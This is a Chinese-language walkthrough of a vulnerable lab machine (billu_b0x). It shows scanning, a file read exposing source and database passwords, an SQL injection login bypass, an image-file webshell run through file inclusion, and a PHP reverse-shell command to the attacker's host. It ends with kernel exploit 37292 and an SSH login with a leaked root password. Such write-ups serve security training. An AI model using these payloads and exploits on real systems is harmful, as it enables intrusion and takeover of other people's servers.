靶机设置
无特殊设置
Nmap扫描
主机发现
sudo nmap -sn 192.168.9.0/24
对比发现新增IP,此IP为靶机IP:192.168.9.154
TCP开放端口扫描
sudo nmap -sT --min-rate 10000 -p- 192.168.9.154
开放了22,80端口
UDP开放端口扫描
sudo nmap -sU --min-rate 10000 -p- 192.168.9.154
没有开放的UDP端口
TCP详细信息扫描
sudo nmap -sT -sV -sC -O -p22,80 192.168.9.154 -oA nmap/detail
linux+apache。linux内核版本比较低
vuln漏洞脚本扫描
sudo nmap --script=vuln -p22,80 192.168.9.154
/test.php,重点观察一下
Getshell
80-主页面
展现一下SQLI skills。好的喵,那SQL注入试一下:
加'或者"都没有报错,而且没有回显QAQ
80-test.php
没有
file参数?
先试一下GET传递:http://192.168.9.154/test.php?file=/etc/passwd
没有反应。
试一下POST传递:curl http://192.168.9.154/test.php -X POST -d "file=/etc/passwd"
有回显,但是我curl实在烂。还是用Burpsuite试试QAQ
嘿嘿,果然有任意文件读取。不过/etc/shadow不让读
root:x:0:0:root:/root:/bin/bash
ica:x:1000:1000:ica,,,:/home/ica:/bin/bash
那读一下/index.php把
<?php
session_start();
include('c.php');
include('head.php');
if(@$_SESSION['logged']!=true)
{
$_SESSION['logged']='';
}
if($_SESSION['logged']==true && $_SESSION['admin']!='') # mark
{
echo "you are logged in :)";
header('Location: panel.php', true, 302);
}else
{
echo '<div align=center style="margin:30px 0px 0px 0px;">
<font size=8 face="comic sans ms">--==[[ billu b0x ]]==--</font>
<br><br>
Show me your SQLI skills <br>
<form method=post>
Username :- <Input type=text name=un> &nbsp Password:- <input type=password name=ps> <br><br>
<input type=submit name=login value="let\'s login">';
}
if(isset($_POST['login']))
{
$uname=str_replace('\'','',urldecode($_POST['un']));
$pass=str_replace('\'','',urldecode($_POST['ps'])); # 过滤单引号
$run='select * from auth where pass=\''.$pass.'\' and uname=\''.$uname.'\''; # mark
$result = mysqli_query($conn, $run);
if (mysqli_num_rows($result) > 0) {
$row = mysqli_fetch_assoc($result);
echo "You are allowed<br>";
$_SESSION['logged']=true;
$_SESSION['admin']=$row['username'];
header('Location: panel.php', true, 302);
}
else
{
echo "<script>alert('Try again');</script>";
}
}
echo "<font size=5 face=\"comic sans ms\" style=\"left: 0;bottom: 0; position: absolute;margin: 0px 0px 5px;\">B0X Powered By <font color=#ff9933>Pirates</font> ";
?>
目录扫描
sudo dirb http://192.168.9.154/
sudo gobuster dir -u http://192.168.9.154/ --wordlist=/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
继续用test.php读文件:
panel:文件包含
<?php
session_start();
include('c.php');
include('head2.php');
if(@$_SESSION['logged']!=true )
{
header('Location: index.php', true, 302);
exit();
}
echo "Welcome to billu b0x ";
echo '<form method=post style="margin: 10px 0px 10px 95%;"><input type=submit name=lg value=Logout></form>';
if(isset($_POST['lg']))
{
unset($_SESSION['logged']);
unset($_SESSION['admin']);
header('Location: index.php', true, 302);
}
echo '<hr><br>';
echo '<form method=post>
<select name=load>
<option value="show">Show Users</option>
<option value="add">Add User</option>
</select>
&nbsp<input type=submit name=continue value="continue"></form><br><br>';
if(isset($_POST['continue']))
{
$dir=getcwd();
$choice=str_replace('./','',$_POST['load']);
if($choice==='add')
{
include($dir.'/'.$choice.'.php');
die();
}
if($choice==='show')
{
include($dir.'/'.$choice.'.php');
die();
}
else
{
include($dir.'/'.$_POST['load']);
}
}
if(isset($_POST['upload']))
{
$name=mysqli_real_escape_string($conn,$_POST['name']);
$address=mysqli_real_escape_string($conn,$_POST['address']);
$id=mysqli_real_escape_string($conn,$_POST['id']);
if(!empty($_FILES['image']['name']))
{
$iname=mysqli_real_escape_string($conn,$_FILES['image']['name']);
$r=pathinfo($_FILES['image']['name'],PATHINFO_EXTENSION);
$image=array('jpeg','jpg','gif','png');
if(in_array($r,$image))
{
$finfo = @new finfo(FILEINFO_MIME);
$filetype = @$finfo->file($_FILES['image']['tmp_name']);
if(preg_match('/image\/jpeg/',$filetype ) || preg_match('/image\/png/',$filetype ) || preg_match('/image\/gif/',$filetype ))
{
if (move_uploaded_file($_FILES['image']['tmp_name'], 'uploaded_images/'.$_FILES['image']['name']))
{
echo "Uploaded successfully ";
$update='insert into users(name,address,image,id) values(\''.$name.'\',\''.$address.'\',\''.$iname.'\', \''.$id.'\')';
mysqli_query($conn, $update);
}
}
else
{
echo "<br>i told you dear, only png,jpg and gif file are allowed";
}
}
else
{
echo "<br>only png,jpg and gif file are allowed";
}
}
}
?>in.php:是phpinfo()
head/head2:CSS样式
c.php:SQL连接,暴露出了一组账号密码:"billu","b0x_billu"。尝试ssh连接,失败
<?php
#header( 'Z-Powered-By:its chutiyapa xD' );
header('X-Frame-Options: SAMEORIGIN');
header( 'Server:testing only' );
header( 'X-Powered-By:testing only' );
ini_set( 'session.cookie_httponly', 1 );
$conn = mysqli_connect("127.0.0.1","billu","b0x_billu","ica_lab");
// Check connection
if (mysqli_connect_errno())
{
echo "connection failed -> " . mysqli_connect_error();
}
?>show.php:用户展示
<?php
include('c.php');
if(isset($_POST['continue']))
{
$run='select * from users ';
$result = mysqli_query($conn, $run);
if (mysqli_num_rows($result) > 0) {
echo "<table width=90% ><tr><td>ID</td><td>User</td><td>Address</td><td>Image</td></tr>";
while($row = mysqli_fetch_assoc($result))
{
echo '<tr><td>'.$row['id'].'</td><td>'.htmlspecialchars ($row['name'],ENT_COMPAT).'</td><td>'.htmlspecialchars ($row['address'],ENT_COMPAT).'</td><td><img src="uploaded_images/'.htmlspecialchars ($row['image'],ENT_COMPAT).'" height=90px width=100px></td></tr>';
}
echo "</table>";
}
}
?>add.php:图片上传
<?php
echo '<form method="post" enctype="multipart/form-data">
Select image to upload:
<input type="file" name=image>
<input type=text name=name value="name">
<input type=text name=address value="address">
<input type=text name=id value=1337 >
<input type="submit" value="upload" name="upload">
</form>';
?>
80-sql注入
回到主界面。因为拿到了index源码,不难分析:
对传入的参数单引号转义,但没有对反斜杠进行转义,存在SQL注入。sql查询语句:
'select * from auth where pass=\''.$pass.'\' and uname=\''.$uname.'\''
=> select * from auth where pass='.$pass.' and uname='.$uname.'输入:' or 1=1 -- \ =单引号转义=> \' or 1=1 -- \
实际执行:
=> select * from auth where pass='\' or 1=1 -- \' and uname='\' or 1=1 -- \'
=> select * from auth where pass='\' or 1=1 -- \' and uname='\' or 1=1 -- \'
=> select * from auth where pass=' 被单引号包括了,所以不重要 '\' or 1=1 -- \'
=> select * from auth where pass=' 被单引号包括了,所以不重要 ' or 1=1 -- 成功登入:
80-图片马上传
发现一个上传:
编辑了一个假冒jpg上传:
被拦截了,那应该是文件头检测的。
做一个图片马:cat test.php >> backdoor.png
再cat检查一下
上传成功:
找一下图片地址:http://192.168.9.154/uploaded_images/backdoor.png
接下来需要用文件包含,来使.png的后缀以php的方式运行:panel就可以
(这里不知道为什么.png一直失败,换成.jpg就成功了??)
反弹shell:
https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#php
php -r '$sock=fsockopen("192.168.9.150",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
记得URL编码
反弹成功
法二尝试:phpMyAdmin-getshell
根据文件包含拿到的源码信息,怀疑有phpmyadmin:http://192.168.9.154/phpmy/
账户密码来自c.php:billu : b0x_billu
成功进入:
phpMyAdmin挂马的两种方式(见小标题)都必须满足三个条件:
- 未限制导出文件路径
- 当前用户有写文件的权限
- 知道网站根目录
1.into outfile直接写文件
查看mysql导出的默认路径:
SHOW VARIABLES LIKE '%secure%'
没有限制导出写入文件的路径
但是我们没有写入文件的权限:
select '<?php phpinfo();?>' into outfile "/var/www/shell.php"
2.利用日志执行包含木马的SQL语句
尝试日志文件能否挂马
查看全局日志情况:
SHOW VARIABLES LIKE '%general%'
当前全局日志是关闭的,且已经指定路径
尝试开启全局日志,并指定路径:
set global general_log = on;
set global general_log_file = '/var/www/shell.php';
没有权限,失败
综上:phpMyAdmin挂马失败。
提权
基础信息
确认靶机
python提升交互性
要密码,g
内核漏洞提权
失败尝试
好吧,还记得内核版本低——试试
searchsploit linux kernel 3.13.0 | grep 'Privilege Escalation'
版本最近的:34923
searchsploit -m 34923
# 下载
cat 34923.c
gcc -Wall fuse_suid.c `pkg-config fuse --cflags --libs` -o fuse_suid
mkdir test
./fuse_suid test kali架设简单的http服务:sudo php -S 0:80
靶机切换到/tmp目录下下载:wget http://192.168.9.150/34923.c
编译失败,下一个:
50135失败
37292提权成功
其他没有什么特别合适的了。放宽范围试试:searchsploit linux kernel 3.13 | grep 'Privilege Escalation'
这个机器是Ubuntu,37292
searchsploit -m 37292 # 检查了没有特殊编译要求
wget http://192.168.9.150/37292.c
gcc 37292.c -o 37292
成功!
法二:phpmy敏感信息泄露
Auto_Wordlists/wordlists/file_inclusion_linux.txt at main · carlospolop/Auto_Wordlists (github.com)
搜索phpmy发现敏感信息文件名:
获得数据库账户密码:root/roottoor
尝试ssh连接:
ssh root@192.168.9.154
# 密码:root/roottoor
拿下!